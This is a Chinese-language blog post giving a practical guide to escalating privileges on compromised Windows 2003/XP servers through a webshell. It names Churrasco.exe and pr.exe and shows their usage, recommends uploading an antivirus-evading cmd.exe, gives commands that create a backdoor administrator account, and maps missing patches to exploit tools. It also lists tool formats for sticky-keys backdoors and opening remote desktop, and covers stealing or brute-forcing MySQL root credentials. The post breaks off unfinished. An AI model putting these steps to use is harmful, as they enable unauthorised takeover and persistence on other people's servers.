我喜欢SEO、网络营销及建站,希望与志同道合的您
建立合作或相互学习关系 QQ:10343829

巴西烤肉 churrasco.exe 如何提权

第一部分:巴西烤肉提权

首先明白:Churrasco.exe是Windows2003系统下的一个本地提权漏洞,只有这个系统可以用巴西烤肉提权。

1.  大马检测一下脚本是否支持wscript.shell 如下图,检测结果是支持。

2.  支持的话传一个cmd.exe 大概80kb左右,网上找个免杀的,传一个bx.exe (巴西烤肉)传上去,勾选wscript.shell

3. 然后再执行提升管理员命令net localgroup administrators admin123456 /add提权即可

4. 常用的漏洞与软件

KB2645640   MS12-009
KB2641653   MS12-018
KB952004     MS09-012 Pr.exe
KB956572     MS09-012 巴西烤肉
KB971657     MS09-041
KB2620712   MS11-097
KB2393802   MS11-011 ms11011.exe
KB942831     MS08-005
KB2503665   MS11-046 ms11046.exe
KB2592799   MS11-080 ms11080.exe

5.   wscript.shell √ 命令行执行组件,显示’×’时用 执行Cmd二 此功能执行

6.  一些其它提权工具的使用格式:

1.pr.exe “执行的语句”
2.ms.exe “执行的语句”
3.巴西烤肉.exe “执行的语句”
4.debug.exe 直接找到路径运行 建立帐号
5.360.exe 直接找到路径运行 按5下shift
6.BAT vbs 直接找到路径运行建立帐号开3389
7.0308.exe “执行的语句”
8.路径\release.exe 直接运行 建立的帐号为 temp 密码为 123456 这是无参数提权
9.prcmd.exe “CMD的路径” “执行的语句”
10.ms10048.exe 直接执行要直接的命令
11.无net建立用户密码

第二部分 pr.exe 提权

首先明白:只有Windows Server 2003和windows xp系统能够使用 pr 提权。

本文讲的是小马在菜刀上的虚拟终端如何提权,大马提权可以参考巴西烤肉。

受影响系统:
Microsoft Windows XP x64 SP2
Microsoft Windows XP x64
Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows Server 2003 SP1

1.  将pr.exe 和cmd.exe 上传至 目录,上传目录必须 :可读可写目录不能有空格

2. 将当前终端设置为我们上传的cmd.exe

setp "C:\Windows\Temp\cmd.exe"

3. 添加用户并提权

pr.exe "net user hack 123 /add" #新建一个hack用户,密码为 123
pr.exe "net localgroup administrators hack /add" #将hack用户加入administrators管理员组

4. 大马执行方法参考巴西烤肉即可。

第三部分 MYSQL数据库提权

1.  要明白获取mysql数据库最高权限root的账号密码

获取root权限方法: 
1.  读取数据库配置文件获取
2. 下载mysql安装路径(找到mysql安装路径)下的数据文件并破解,Root账号密码存储在mysql数据下的user表里(mysql目录下的user)
    查询一下user表root的用户名与密码就出了。
3. 暴力猜解  ,Hscan,hydra,x-scan等

2. mysql提权有三种方式:

功能型:udf 提权

漏洞型:mof 提权

技巧型:启动项提权

未完,待续。。。。。。,

分享到:更多 ()